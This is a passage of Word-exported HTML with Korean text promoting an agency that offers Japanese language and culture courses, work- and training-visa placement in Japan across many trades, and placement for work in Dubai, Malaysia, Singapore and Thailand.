lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">희망하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">분들 위해</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일본의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">전통문화와</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">풍속을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">익히도록 필요한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">코스를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">개설</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">교육 시키고 취직을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">연결</span></p><p><o:p></o:p></p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">&nbsp; &nbsp; 일본어</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">시험</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> N3, N2(JLPT, JFT, NAT-Test, Top J)&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">이상에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">합격하는 분들이</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">Work Visa </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">인</span><o:p></o:p></li></ol><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">번역</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직업</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; &nbsp; • IT&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직업</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">엔지니어링</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">관련</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직업</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">(</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">Civil</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">Mechanical</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">, EP, EC, Auto CAD&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">등</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">)</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">간호지원</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직업으로 일본으로 가고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">싶다면</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">해당</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">학당으로</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">연결</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp;New Comet Trading Agency</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">다음</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사업체를 훈련</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">비자&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">(Training Visa)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">로 가고 싶은</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">젊은</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">형제</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">자매를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">위해</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비 &nbsp; &nbsp; 스를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">주선하고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">자동차</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">수리</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">및</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">관련</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직업</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">산업</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직업</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">집</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">짓기</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직업</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">식품</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">산업</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">쌀</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">상자</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">공장</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">매장</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">운영</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">호텔</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">비즈니스</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">의류</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">산업</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">건설</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직업</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">농업</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직업</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">물</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제품</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">어업</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">관련</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">공장</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">노인</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">돌봄</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사업</span><o:p></o:p></p><p><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">&nbsp; &nbsp;6. &nbsp;두바이</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">말레이시아</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">싱가포</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">,</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">태국과</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">같은</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">국가에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일하기를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">원하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사람들을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">위해</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기본</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun 